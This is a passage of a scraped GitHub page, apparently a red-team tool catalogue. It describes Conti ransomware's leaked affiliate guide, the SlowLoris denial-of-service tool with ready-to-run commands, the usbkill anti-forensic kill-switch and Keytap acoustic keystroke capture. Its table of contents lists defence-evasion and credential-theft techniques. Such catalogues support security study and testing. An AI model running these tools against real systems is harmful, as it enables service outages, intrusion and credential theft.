exit\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice \u003ca href=\"https://antman1p-30185.medium.com/youre-a-gd-thief-1e02358fd557\" rel=\"nofollow\"\u003eblog post\u003c/a\u003e explaining the logic behind the tool.\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eImpact\u003c/h1\u003e\u003ca id=\"user-content-impact\" class=\"anchor\" aria-label=\"Permalink: Impact\" href=\"#impact\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak\"\u003eConti Pentester Guide Leak\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-conti-pentester-guide-leak\" class=\"anchor\" aria-label=\"Permalink: 🔙Conti Pentester Guide Leak\" href=\"#conti-pentester-guide-leak\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eConti is a ransomware group that is known for targeting large organizations and using sophisticated tactics to evade detection and maximize the impact of their attacks.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eConti has been responsible for a number of high-profile ransomware attacks, including ones against the computer systems of the City of Pensacola, Florida, and the computer systems of the Irish health service.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe \u003ca href=\"https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak\"\u003eConti Pentester Guide Leak - Repository\u003c/a\u003e contains leaked pentesting materials given to Conti ransomware group affilates.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTopics include:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eConfiguring Rclone with MEGA for data exfiltration\u003c/li\u003e\n\u003cli\u003eConfiguring AnyDesk as persistence and remote access into a victim’s network\u003c/li\u003e\n\u003cli\u003eElevating and gaining admin rights inside a company’s hacked network\u003c/li\u003e\n\u003cli\u003eTaking over domain controllers\u003c/li\u003e\n\u003cli\u003eDumping passwords from Active Directory\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003cem\u003e\u003ca href=\"https://www.vx-underground.org/\" rel=\"nofollow\"\u003evx-underground.org\u003c/a\u003e obtained more training materials and tools used by Conti ransomware operators \u003ca href=\"https://share.vx-underground.org/Conti/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210856582-44a9bf16-23d4-4b7e-9e91-8604c3191e78.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210856582-44a9bf16-23d4-4b7e-9e91-8604c3191e78.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/ForbiddenProgrammer/conti-pentester-guide-leak\"\u003ehttps://github.com/ForbiddenProgrammer/conti-pentester-guide-leak\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/gkbrk/slowloris\"\u003eSlowLoris\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-slowloris\" class=\"anchor\" aria-label=\"Permalink: 🔙SlowLoris\" href=\"#slowloris\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSlowloris is a type of denial-of-service (DoS) attack that involves sending HTTP requests to a web server in a way that ties up the server's resources, preventing it from being able to process legitimate requests.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis attack would typically be conducted with a botnet, it is designed to be difficult to detect and mitigate, as it uses a relatively small number of connections and does not generate a large amount of traffic.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Pip)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo pip3 install slowloris\"\u003e\u003cpre\u003esudo pip3 install slowloris\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/gkbrk/slowloris.git\ncd slowloris\"\u003e\u003cpre\u003egit clone https://github.com/gkbrk/slowloris.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e slowloris\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Pip\nslowloris example.comr\n\n# Git\npython3 slowloris.py example.com\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Pip\u003c/span\u003e\nslowloris example.comr\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Git\u003c/span\u003e\npython3 slowloris.py example.com\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210115630-b6541ee0-ad82-471a-9a7e-7f0ec028c67d.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210115630-b6541ee0-ad82-471a-9a7e-7f0ec028c67d.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/hephaest0s/usbkill\"\u003eusbkill\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-usbkill\" class=\"anchor\" aria-label=\"Permalink: 🔙usbkill\" href=\"#usbkill\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis is an anti-forensic kill-switch that waits for a change in USB port status, immediately shutting down endpoint if a change is detected.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIn some situations, it is imperative that no data is added or removed from an endpoint via USB.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis is where USBkill comes in.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/hephaest0s/usbkill\ncd usbkill\n./setup.py install\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/hephaest0s/usbkill\ncd usbkill\n./setup.py install\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo python3 usbkill.py\"\u003e\u003cpre\u003esudo python3 usbkill.py\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/217654429-98efef6d-b70f-48b8-8979-228ce2f78932.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/217654429-98efef6d-b70f-48b8-8979-228ce2f78932.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://en.wikipedia.org/wiki/USBKill\" rel=\"nofollow\"\u003ehttps://en.wikipedia.org/wiki/USBKill\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/ggerganov/kbd-audio\"\u003eKeytap\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-keytap\" class=\"anchor\" aria-label=\"Permalink: 🔙Keytap\" href=\"#keytap\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis is a tool that can guess the pressed keyboard keys from the audio of a computer's microphone.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eKeytap2 can also be used to retrieve text from audio snippets of keyboard typing.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Build)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/ggerganov/kbd-audio\ncd kbd-audio\ngit submodule update --init\nmkdir build \u0026amp;\u0026amp; cd build\ncmake ..\nmake\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/ggerganov/kbd-audio\ncd kbd-audio\ngit submodule update --init\nmkdir build \u0026amp;\u0026amp; cd build\ncmake ..\nmake\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Record audio to a raw binary file on disk\n./record-full output.kbd [-cN]\n\n# Playback a recording captured via the record-full tool\n./play-full input.kbd [-pN]\n\n# Record audio only while typing (Useful for collecting training data for keytap)\n./record output.kbd [-cN] [-CN]\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Record audio to a raw binary file on disk\u003c/span\u003e\n./record-full output.kbd [-cN]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Playback a recording captured via the record-full tool\u003c/span\u003e\n./play-full input.kbd [-pN]\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Record audio only while typing (Useful for collecting training data for keytap)\u003c/span\u003e\n./record output.kbd [-cN] [-CN]\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eSee full usage documentation \u003ca href=\"https://github.com/ggerganov/kbd-audio#tool-details\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTry the online demo at \u003ca href=\"https://keytap.ggerganov.com/\" rel=\"nofollow\"\u003ehttps://keytap.ggerganov.com/\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/229649861-728e7ebb-ddb9-4347-9934-dd077d12bb41.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/229649861-728e7ebb-ddb9-4347-9934-dd077d12bb41.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/ggerganov/kbd-audio\"\u003ehttps://github.com/ggerganov/kbd-audio\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003c/article\u003e","loaded":true,"timedOut":false,"errorMessage":null,"headerInfo":{"toc":[{"level":1,"text":"RedTeam-Tools","anchor":"redteam-tools","htmlText":"RedTeam-Tools"},{"level":1,"text":"Tool List","anchor":"tool-list","htmlText":"Tool List"},{"level":1,"text":"Red Team Tips","anchor":"red-team-tips","htmlText":"Red Team Tips"},{"level":3,"text":"🔙Improved HTML smuggling with mouse move eventlistener","anchor":"improved-html-smuggling-with-mouse-move-eventlistener","htmlText":"🔙Improved HTML smuggling with mouse move eventlistener"},{"level":3,"text":"🔙Google translate for phishing","anchor":"google-translate-for-phishing","htmlText":"🔙Google translate for phishing"},{"level":3,"text":"🔙Hiding the local admin account","anchor":"hiding-the-local-admin-account","htmlText":"🔙Hiding the local admin account"},{"level":3,"text":"🔙Cripple windows defender by deleting signatures","anchor":"cripple-windows-defender-by-deleting-signatures","htmlText":"🔙Cripple windows defender by deleting signatures"},{"level":3,"text":"🔙Enable multiple RDP sessions per user","anchor":"enable-multiple-rdp-sessions-per-user","htmlText":"🔙Enable multiple RDP sessions per user"},{"level":3,"text":"🔙Sysinternals PsExec.exe local alternative","anchor":"sysinternals-psexecexe-local-alternative","htmlText":"🔙Sysinternals PsExec.exe local alternative"},{"level":3,"text":"🔙Live off the land port scanner","anchor":"live-off-the-land-port-scanner","htmlText":"🔙Live off the land port scanner"},{"level":3,"text":"🔙Proxy aware PowerShell DownloadString","anchor":"proxy-aware-powershell-downloadstring","htmlText":"🔙Proxy aware PowerShell DownloadString"},{"level":3,"text":"🔙Looking for internal endpoints in browser bookmarks","anchor":"looking-for-internal-endpoints-in-browser-bookmarks","htmlText":"🔙Looking for internal endpoints in browser bookmarks"},{"level":3,"text":"🔙Query DNS records for enumeration","anchor":"query-dns-records-for-enumeration","htmlText":"🔙Query DNS records for enumeration"},{"level":3,"text":"🔙Unquoted service paths without PowerUp","anchor":"unquoted-service-paths-without-powerup","htmlText":"🔙Unquoted service paths without PowerUp"},{"level":3,"text":"🔙Bypass a disabled command prompt with /k","anchor":"bypass-a-disabled-command-prompt-with-k","htmlText":"🔙Bypass a disabled command prompt with /k"},{"level":3,"text":"🔙Stop windows defender deleting mimikatz.exe","anchor":"stop-windows-defender-deleting-mimikatzexe","htmlText":"🔙Stop windows defender deleting mimikatz.exe"},{"level":3,"text":"🔙Check if you are in a virtual machine","anchor":"check-if-you-are-in-a-virtual-machine","htmlText":"🔙Check if you are in a virtual machine"},{"level":3,"text":"🔙Enumerate AppLocker rules","anchor":"enumerate-applocker-rules","htmlText":"🔙Enumerate AppLocker rules"},{"level":3,"text":"🔙CMD shortcut with 6 pixels via mspaint","anchor":"cmd-shortcut-with-6-pixels-via-mspaint","htmlText":"🔙CMD shortcut with 6 pixels via mspaint"},{"level":3,"text":"🔙Link spoofing with PreventDefault JavaScript method","anchor":"link-spoofing-with-preventdefault-javascript-method","htmlText":"🔙Link spoofing with PreventDefault JavaScript method"},{"level":3,"text":"🔙Check SMB firewall rules with Responder","anchor":"check-smb-firewall-rules-with-responder","htmlText":"🔙Check SMB firewall rules with Responder"},{"level":3,"text":"🔙Disable AV with SysInternals PsSuspend","anchor":"disable-av-with-sysinternals-pssuspend","htmlText":"🔙Disable AV with SysInternals PsSuspend"},{"level":1,"text":"Reconnaissance","anchor":"reconnaissance","htmlText":"Reconnaissance"},{"level":3,"text":"🔙spiderfoot","anchor":"spiderfoot","htmlText":"🔙spiderfoot"},{"level":3,"text":"🔙reconftw","anchor":"reconftw","htmlText":"🔙reconftw"},{"level":3,"text":"🔙subzy","anchor":"subzy","htmlText":"🔙subzy"},{"level":3,"text":"🔙smtp-user-enum","anchor":"smtp-user-enum","htmlText":"🔙smtp-user-enum"},{"level":3,"text":"🔙crt.sh -\u003e httprobe -\u003e EyeWitness","anchor":"crtsh---httprobe---eyewitness","htmlText":"🔙crt.sh -\u0026gt; httprobe -\u0026gt; EyeWitness"},{"level":3,"text":"🔙jsendpoints","anchor":"jsendpoints","htmlText":"🔙jsendpoints"},{"level":3,"text":"🔙nuclei","anchor":"nuclei","htmlText":"🔙nuclei"},{"level":3,"text":"🔙certSniff","anchor":"certsniff","htmlText":"🔙certSniff"},{"level":3,"text":"🔙gobuster","anchor":"gobuster","htmlText":"🔙gobuster"},{"level":3,"text":"🔙feroxbuster","anchor":"feroxbuster","htmlText":"🔙feroxbuster"},{"level":3,"text":"🔙CloudBrute","anchor":"cloudbrute","htmlText":"🔙CloudBrute"},{"level":3,"text":"🔙dnsrecon","anchor":"dnsrecon","htmlText":"🔙dnsrecon"},{"level":3,"text":"🔙shodan.io","anchor":"shodanio","htmlText":"🔙shodan.io"},{"level":3,"text":"🔙AORT","anchor":"aort","htmlText":"🔙AORT"},{"level":3,"text":"🔙spoofcheck","anchor":"spoofcheck","htmlText":"🔙spoofcheck"},{"level":3,"text":"🔙AWSBucketDump","anchor":"awsbucketdump","htmlText":"🔙AWSBucketDump"},{"level":3,"text":"🔙GitHarvester","anchor":"githarvester","htmlText":"🔙GitHarvester"},{"level":3,"text":"🔙truffleHog","anchor":"trufflehog","htmlText":"🔙truffleHog"},{"level":3,"text":"🔙Dismap","anchor":"dismap","htmlText":"🔙Dismap"},{"level":3,"text":"🔙enum4linux","anchor":"enum4linux","htmlText":"🔙enum4linux"},{"level":3,"text":"🔙skanuvaty","anchor":"skanuvaty","htmlText":"🔙skanuvaty"},{"level":3,"text":"🔙Metabigor","anchor":"metabigor","htmlText":"🔙Metabigor"},{"level":3,"text":"🔙Gitrob","anchor":"gitrob","htmlText":"🔙Gitrob"},{"level":3,"text":"🔙gowitness","anchor":"gowitness","htmlText":"🔙gowitness"},{"level":1,"text":"Resource Development","anchor":"resource-development","htmlText":"Resource Development"},{"level":3,"text":"🔙remoteInjector","anchor":"remoteinjector","htmlText":"🔙remoteInjector"},{"level":3,"text":"🔙Chimera","anchor":"chimera","htmlText":"🔙Chimera"},{"level":3,"text":"🔙msfvenom","anchor":"msfvenom","htmlText":"🔙msfvenom"},{"level":4,"text":"Msfvenom Commands","anchor":"msfvenom-commands","htmlText":"Msfvenom Commands"},{"level":3,"text":"🔙Shellter","anchor":"shellter","htmlText":"🔙Shellter"},{"level":3,"text":"🔙Freeze","anchor":"freeze","htmlText":"🔙Freeze"},{"level":3,"text":"🔙WordSteal","anchor":"wordsteal","htmlText":"🔙WordSteal"},{"level":3,"text":"🔙NTAPI Undocumented Functions","anchor":"ntapi-undocumented-functions","htmlText":"🔙NTAPI Undocumented Functions"},{"level":3,"text":"🔙Kernel Callback Functions","anchor":"kernel-callback-functions","htmlText":"🔙Kernel Callback Functions"},{"level":3,"text":"🔙OffensiveVBA","anchor":"offensivevba","htmlText":"🔙OffensiveVBA"},{"level":3,"text":"🔙WSH","anchor":"wsh","htmlText":"🔙WSH"},{"level":3,"text":"🔙HTA","anchor":"hta","htmlText":"🔙HTA"},{"level":3,"text":"🔙VBA","anchor":"vba","htmlText":"🔙VBA"},{"level":1,"text":"Initial Access","anchor":"initial-access","htmlText":"Initial Access"},{"level":3,"text":"🔙CredMaster","anchor":"credmaster","htmlText":"🔙CredMaster"},{"level":3,"text":"🔙TREVORspray","anchor":"trevorspray","htmlText":"🔙TREVORspray"},{"level":3,"text":"🔙evilqr","anchor":"evilqr","htmlText":"🔙evilqr"},{"level":3,"text":"🔙CUPP","anchor":"cupp","htmlText":"🔙CUPP"},{"level":3,"text":"🔙Bash Bunny","anchor":"bash-bunny","htmlText":"🔙Bash Bunny"},{"level":3,"text":"🔙EvilGoPhish","anchor":"evilgophish","htmlText":"🔙EvilGoPhish"},{"level":3,"text":"🔙Social Engineer Toolkit (SET)","anchor":"social-engineer-toolkit-set","htmlText":"🔙Social Engineer Toolkit (SET)"},{"level":3,"text":"🔙Hydra","anchor":"hydra","htmlText":"🔙Hydra"},{"level":3,"text":"🔙SquarePhish","anchor":"squarephish","htmlText":"🔙SquarePhish"},{"level":3,"text":"🔙King Phisher","anchor":"king-phisher","htmlText":"🔙King Phisher"},{"level":1,"text":"Execution","anchor":"execution","htmlText":"Execution"},{"level":3,"text":"🔙Responder","anchor":"responder","htmlText":"🔙Responder"},{"level":3,"text":"🔙secretsdump","anchor":"secretsdump","htmlText":"🔙secretsdump"},{"level":3,"text":"🔙evil-winrm","anchor":"evil-winrm","htmlText":"🔙evil-winrm"},{"level":3,"text":"🔙Donut","anchor":"donut","htmlText":"🔙Donut"},{"level":3,"text":"🔙Macro_pack","anchor":"macro_pack","htmlText":"🔙Macro_pack"},{"level":3,"text":"🔙PowerSploit","anchor":"powersploit","htmlText":"🔙PowerSploit"},{"level":3,"text":"🔙Rubeus","anchor":"rubeus","htmlText":"🔙Rubeus"},{"level":3,"text":"🔙SharpUp","anchor":"sharpup","htmlText":"🔙SharpUp"},{"level":3,"text":"🔙SQLRecon","anchor":"sqlrecon","htmlText":"🔙SQLRecon"},{"level":3,"text":"🔙UltimateAppLockerByPassList","anchor":"ultimateapplockerbypasslist","htmlText":"🔙UltimateAppLockerByPassList"},{"level":3,"text":"🔙StarFighters","anchor":"starfighters","htmlText":"🔙StarFighters"},{"level":3,"text":"🔙demiguise","anchor":"demiguise","htmlText":"🔙demiguise"},{"level":2,"text":"🔙PowerZure","anchor":"powerzure","htmlText":"🔙PowerZure"},{"level":1,"text":"Persistence","anchor":"persistence","htmlText":"Persistence"},{"level":3,"text":"🔙Impacket","anchor":"impacket","htmlText":"🔙Impacket"},{"level":3,"text":"🔙Empire","anchor":"empire","htmlText":"🔙Empire"},{"level":3,"text":"🔙SharPersist","anchor":"sharpersist","htmlText":"🔙SharPersist"},{"level":3,"text":"🔙ligolo-ng","anchor":"ligolo-ng","htmlText":"🔙ligolo-ng"},{"level":1,"text":"Privilege Escalation","anchor":"privilege-escalation","htmlText":"Privilege Escalation"},{"level":3,"text":"🔙Crassus","anchor":"crassus","htmlText":"🔙Crassus"},{"level":3,"text":"🔙LinPEAS","anchor":"linpeas","htmlText":"🔙LinPEAS"},{"level":3,"text":"🔙WinPEAS","anchor":"winpeas","htmlText":"🔙WinPEAS"},{"level":3,"text":"🔙linux-smart-enumeration","anchor":"linux-smart-enumeration","htmlText":"🔙linux-smart-enumeration"},{"level":3,"text":"🔙Certify","anchor":"certify","htmlText":"🔙Certify"},{"level":3,"text":"🔙Get-GPPPassword","anchor":"get-gpppassword","htmlText":"🔙Get-GPPPassword"},{"level":3,"text":"🔙Sherlock","anchor":"sherlock","htmlText":"🔙Sherlock"},{"level":3,"text":"🔙Watson","anchor":"watson","htmlText":"🔙Watson"},{"level":3,"text":"🔙ImpulsiveDLLHijack","anchor":"impulsivedllhijack","htmlText":"🔙ImpulsiveDLLHijack"},{"level":3,"text":"🔙ADFSDump","anchor":"adfsdump","htmlText":"🔙ADFSDump"},{"level":3,"text":"🔙BeRoot","anchor":"beroot","htmlText":"🔙BeRoot"},{"level":1,"text":"Defense Evasion","anchor":"defense-evasion","htmlText":"Defense Evasion"},{"level":3,"text":"🔙Invoke-Obfuscation","anchor":"invoke-obfuscation","htmlText":"🔙Invoke-Obfuscation"},{"level":3,"text":"🔙Veil","anchor":"veil","htmlText":"🔙Veil"},{"level":3,"text":"🔙SharpBlock","anchor":"sharpblock","htmlText":"🔙SharpBlock"},{"level":3,"text":"🔙Alcatraz","anchor":"alcatraz","htmlText":"🔙Alcatraz"},{"level":3,"text":"🔙Mangle","anchor":"mangle","htmlText":"🔙Mangle"},{"level":3,"text":"🔙AMSI Fail","anchor":"amsi-fail","htmlText":"🔙AMSI Fail"},{"level":3,"text":"🔙ScareCrow","anchor":"scarecrow","htmlText":"🔙ScareCrow"},{"level":3,"text":"🔙moonwalk","anchor":"moonwalk","htmlText":"🔙moonwalk"},{"level":1,"text":"Credential Access","anchor":"credential-access","htmlText":"Credential Access"},{"level":3,"text":"🔙Mimikatz","anchor":"mimikatz","htmlText":"🔙Mimikatz"},{"level":3,"text":"🔙LaZagne","anchor":"lazagne","htmlText":"🔙LaZagne"},{"level":3,"text":"🔙hashcat","anchor":"hashcat","htmlText":"🔙hashcat"},{"level":3,"text":"🔙John the Ripper","anchor":"john-the-ripper","htmlText":"🔙John the 